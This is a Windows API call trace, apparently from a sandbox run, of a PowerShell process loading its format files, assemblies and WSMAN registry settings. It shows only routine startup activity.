	[0525.851] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xfc2403ef, Data2=0x1a0b, Data3=0x4666, Data4=([0]=0xab, [1]=0x66, [2]=0x3f, [3]=0xa8, [4]=0x64, [5]=0x7a, [6]=0xf7, [7]=0xa3))) returned 0x0
	[0525.852] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xc96f5eb7, Data2=0xed77, Data3=0x4a41, Data4=([0]=0x92, [1]=0xe8, [2]=0xaa, [3]=0xfc, [4]=0xfc, [5]=0x7b, [6]=0xd4, [7]=0xc8))) returned 0x0
	[0525.852] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x9fd427a0, Data2=0x10e0, Data3=0x4c5b, Data4=([0]=0x97, [1]=0xf6, [2]=0xff, [3]=0xfe, [4]=0x1c, [5]=0xb0, [6]=0x9c, [7]=0x5d))) returned 0x0
	[0525.852] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x29b0baee, Data2=0xc1ca, Data3=0x498c, Data4=([0]=0xae, [1]=0xea, [2]=0x16, [3]=0xa3, [4]=0x12, [5]=0xed, [6]=0x96, [7]=0xca))) returned 0x0
	[0525.852] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x25c62c80, Data2=0x1be, Data3=0x41b2, Data4=([0]=0xa7, [1]=0xed, [2]=0x9c, [3]=0xe4, [4]=0x8d, [5]=0x52, [6]=0xe1, [7]=0xb4))) returned 0x0
	[0525.852] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xd232a5f7, Data2=0x6198, Data3=0x4832, Data4=([0]=0x90, [1]=0xa8, [2]=0x71, [3]=0x30, [4]=0xe, [5]=0x50, [6]=0xa0, [7]=0xdc))) returned 0x0
	[0525.853] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xb77ace7b, Data2=0x7c69, Data3=0x4fb4, Data4=([0]=0x9a, [1]=0xe2, [2]=0xf6, [3]=0xd4, [4]=0xf7, [5]=0x1, [6]=0x16, [7]=0x8c))) returned 0x0
	[0525.853] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xebc26233, Data2=0x8c29, Data3=0x44ac, Data4=([0]=0xbb, [1]=0xd4, [2]=0x73, [3]=0xf0, [4]=0xdd, [5]=0x33, [6]=0x6e, [7]=0xee))) returned 0x0
	[0525.853] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x745bc984, Data2=0xc98d, Data3=0x4c59, Data4=([0]=0x9c, [1]=0x5, [2]=0xd2, [3]=0x23, [4]=0xe1, [5]=0x18, [6]=0xeb, [7]=0xac))) returned 0x0
	[0525.853] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xaddd20fe, Data2=0x6934, Data3=0x4655, Data4=([0]=0xb1, [1]=0xb6, [2]=0x74, [3]=0x35, [4]=0x22, [5]=0x7d, [6]=0xaf, [7]=0xba))) returned 0x0
	[0525.853] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x7375cccf, Data2=0x9a33, Data3=0x40d4, Data4=([0]=0xa6, [1]=0xac, [2]=0x26, [3]=0x2b, [4]=0xe3, [5]=0x49, [6]=0xf1, [7]=0x2a))) returned 0x0
	[0525.853] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x5dc25f7f, Data2=0x899c, Data3=0x425a, Data4=([0]=0x83, [1]=0x4f, [2]=0x91, [3]=0x6c, [4]=0x32, [5]=0x54, [6]=0x7e, [7]=0x13))) returned 0x0
	[0525.853] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xf35876eb, Data2=0x5d81, Data3=0x4fc9, Data4=([0]=0xb8, [1]=0x93, [2]=0xd3, [3]=0xf2, [4]=0x34, [5]=0x1b, [6]=0x2a, [7]=0x24))) returned 0x0
	[0525.853] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xed16be2f, Data2=0xdcc2, Data3=0x4f1e, Data4=([0]=0x9c, [1]=0xf2, [2]=0x3c, [3]=0x95, [4]=0xeb, [5]=0xa4, [6]=0xa1, [7]=0xe9))) returned 0x0
	[0525.854] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x18146be6, Data2=0x7823, Data3=0x42d1, Data4=([0]=0xa1, [1]=0xe3, [2]=0x4b, [3]=0x10, [4]=0x7c, [5]=0x28, [6]=0x75, [7]=0xa2))) returned 0x0
	[0525.854] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x11b66945, Data2=0xe636, Data3=0x4535, Data4=([0]=0x8a, [1]=0x89, [2]=0x33, [3]=0xc7, [4]=0xcb, [5]=0x4a, [6]=0x92, [7]=0x2f))) returned 0x0
	[0525.854] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0525.854] GetFileType (hFile=0x324) returned 0x1
	[0525.854] SetErrorMode (uMode=0x1) returned 0x1
	[0525.854] GetFileType (hFile=0x324) returned 0x1
	[0525.854] ReadFile (in: hFile=0x324, lpBuffer=0x3193558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3193558*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.855] ReadFile (in: hFile=0x324, lpBuffer=0x3193558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3193558*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.855] ReadFile (in: hFile=0x324, lpBuffer=0x3193558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3193558*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.855] ReadFile (in: hFile=0x324, lpBuffer=0x3193558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3193558*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.856] ReadFile (in: hFile=0x324, lpBuffer=0x3193558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3193558*, lpNumberOfBytesRead=0x12cf18*=0x8b4, lpOverlapped=0x0) returned 1
	[0525.856] ReadFile (in: hFile=0x324, lpBuffer=0x3192974, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3192974*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0525.856] ReadFile (in: hFile=0x324, lpBuffer=0x3193558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3193558*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0525.856] CloseHandle (hObject=0x324) returned 1
	[0525.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0525.856] SetErrorMode (uMode=0x1) returned 0x1
	[0525.856] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cec0 | out: lpFileInformation=0x12cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0525.856] SetErrorMode (uMode=0x1) returned 0x1
	[0525.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0525.857] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cfa8 | out: phkResult=0x12cfa8*=0x324) returned 0x0
	[0525.857] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cf2c, lpData=0x0, lpcbData=0x12cf28*=0x0 | out: lpType=0x12cf2c*=0x1, lpData=0x0, lpcbData=0x12cf28*=0x56) returned 0x0
	[0525.857] CoTaskMemAlloc (cb=0x5a) returned 0x3b3da0
	[0525.857] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cefc, lpData=0x3b3da0, lpcbData=0x12cef8*=0x56 | out: lpType=0x12cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cef8*=0x56) returned 0x0
	[0525.857] CoTaskMemFree (pv=0x3b3da0) 
	[0525.857] RegCloseKey (hKey=0x324) returned 0x0
	[0525.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0525.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0525.858] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x45a19eaf, Data2=0xf7e, Data3=0x44f0, Data4=([0]=0xa4, [1]=0x8b, [2]=0x8, [3]=0x1c, [4]=0xe0, [5]=0xe2, [6]=0x1b, [7]=0xae))) returned 0x0
	[0525.858] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x61d964bd, Data2=0x5df, Data3=0x4817, Data4=([0]=0xaf, [1]=0x31, [2]=0x16, [3]=0xa5, [4]=0x66, [5]=0xe2, [6]=0xd9, [7]=0x87))) returned 0x0
	[0525.858] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0525.858] GetFileType (hFile=0x324) returned 0x1
	[0525.858] SetErrorMode (uMode=0x1) returned 0x1
	[0525.858] GetFileType (hFile=0x324) returned 0x1
	[0525.858] ReadFile (in: hFile=0x324, lpBuffer=0x31d1340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x31d1340*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.859] ReadFile (in: hFile=0x324, lpBuffer=0x31d1340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x31d1340*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.859] ReadFile (in: hFile=0x324, lpBuffer=0x31d1340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x31d1340*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.860] ReadFile (in: hFile=0x324, lpBuffer=0x31d1340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x31d1340*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.860] ReadFile (in: hFile=0x324, lpBuffer=0x31d1340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x31d1340*, lpNumberOfBytesRead=0x12cf18*=0xe98, lpOverlapped=0x0) returned 1
	[0525.860] ReadFile (in: hFile=0x324, lpBuffer=0x31d0940, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x31d0940*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0525.860] ReadFile (in: hFile=0x324, lpBuffer=0x31d1340, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x31d1340*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0525.860] CloseHandle (hObject=0x324) returned 1
	[0525.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0525.860] SetErrorMode (uMode=0x1) returned 0x1
	[0525.860] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cec0 | out: lpFileInformation=0x12cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0525.861] SetErrorMode (uMode=0x1) returned 0x1
	[0525.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0525.861] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cfa8 | out: phkResult=0x12cfa8*=0x324) returned 0x0
	[0525.861] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cf2c, lpData=0x0, lpcbData=0x12cf28*=0x0 | out: lpType=0x12cf2c*=0x1, lpData=0x0, lpcbData=0x12cf28*=0x56) returned 0x0
	[0525.861] CoTaskMemAlloc (cb=0x5a) returned 0x3b3da0
	[0525.861] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cefc, lpData=0x3b3da0, lpcbData=0x12cef8*=0x56 | out: lpType=0x12cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cef8*=0x56) returned 0x0
	[0525.861] CoTaskMemFree (pv=0x3b3da0) 
	[0525.861] RegCloseKey (hKey=0x324) returned 0x0
	[0525.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0525.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0525.862] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x8671194c, Data2=0xb84d, Data3=0x4da6, Data4=([0]=0xa3, [1]=0xf2, [2]=0x4a, [3]=0x40, [4]=0x83, [5]=0xdd, [6]=0x1d, [7]=0x9e))) returned 0x0
	[0525.862] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xe828abc3, Data2=0x956, Data3=0x4f52, Data4=([0]=0xb5, [1]=0xab, [2]=0x9e, [3]=0xa0, [4]=0x69, [5]=0xb3, [6]=0x86, [7]=0x6f))) returned 0x0
	[0526.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0526.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0526.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0526.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0526.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0526.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0528.532] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0528.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0528.532] CoTaskMemFree (pv=0x3ba680) 
	[0528.534] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0528.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0528.534] CoTaskMemFree (pv=0x3ba680) 
	[0528.535] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0528.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0528.535] CoTaskMemFree (pv=0x3ba680) 
	[0528.537] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0528.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0528.537] CoTaskMemFree (pv=0x3ba680) 
	[0528.552] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0528.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0528.553] CoTaskMemFree (pv=0x3ba680) 
	[0528.558] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0528.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0528.558] CoTaskMemFree (pv=0x3ba680) 
	[0528.559] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0528.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0528.559] CoTaskMemFree (pv=0x3ba680) 
	[0528.563] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d1b8 | out: phkResult=0x12d1b8*=0x324) returned 0x0
	[0528.564] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d0bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d0b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d0bc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d0b8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0528.564] CoTaskMemFree (pv=0x0) 
	[0528.565] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0528.565] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x34c760, lpcchValueName=0x12d168, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d168, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0528.565] CoTaskMemFree (pv=0x34c760) 
	[0528.565] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0528.565] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x34c760, lpcchValueName=0x12d168, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d168, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0528.565] CoTaskMemFree (pv=0x34c760) 
	[0528.565] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0528.565] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x34c760, lpcchValueName=0x12d168, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d168, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0528.565] CoTaskMemFree (pv=0x34c760) 
	[0528.565] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d14c, lpData=0x0, lpcbData=0x12d148*=0x0 | out: lpType=0x12d14c*=0x1, lpData=0x0, lpcbData=0x12d148*=0x8) returned 0x0
	[0528.566] CoTaskMemAlloc (cb=0xc) returned 0x3ca3b0
	[0528.566] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d11c, lpData=0x3ca3b0, lpcbData=0x12d118*=0x8 | out: lpType=0x12d11c*=0x1, lpData="2.0", lpcbData=0x12d118*=0x8) returned 0x0
	[0528.566] CoTaskMemFree (pv=0x3ca3b0) 
	[0529.833] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d108 | out: phkResult=0x12d108*=0x324) returned 0x0
	[0529.834] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d00c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d008, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d00c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d008*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0529.834] CoTaskMemFree (pv=0x0) 
	[0529.834] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0529.834] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x34c760, lpcchValueName=0x12d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0529.834] CoTaskMemFree (pv=0x34c760) 
	[0529.834] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0529.834] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x34c760, lpcchValueName=0x12d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0529.834] CoTaskMemFree (pv=0x34c760) 
	[0529.834] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0529.834] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x34c760, lpcchValueName=0x12d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0529.834] CoTaskMemFree (pv=0x34c760) 
	[0529.834] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d09c, lpData=0x0, lpcbData=0x12d098*=0x0 | out: lpType=0x12d09c*=0x1, lpData=0x0, lpcbData=0x12d098*=0x8) returned 0x0
	[0529.834] CoTaskMemAlloc (cb=0xc) returned 0x3ca610
	[0529.834] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d06c, lpData=0x3ca610, lpcbData=0x12d068*=0x8 | out: lpType=0x12d06c*=0x1, lpData="2.0", lpcbData=0x12d068*=0x8) returned 0x0
	[0529.834] CoTaskMemFree (pv=0x3ca610) 
	[0529.835] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
	[0529.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.836] CoTaskMemFree (pv=0x3ba680) 
	[0529.840] CoTaskMemAlloc (cb=0x104) returned 0x3ba680
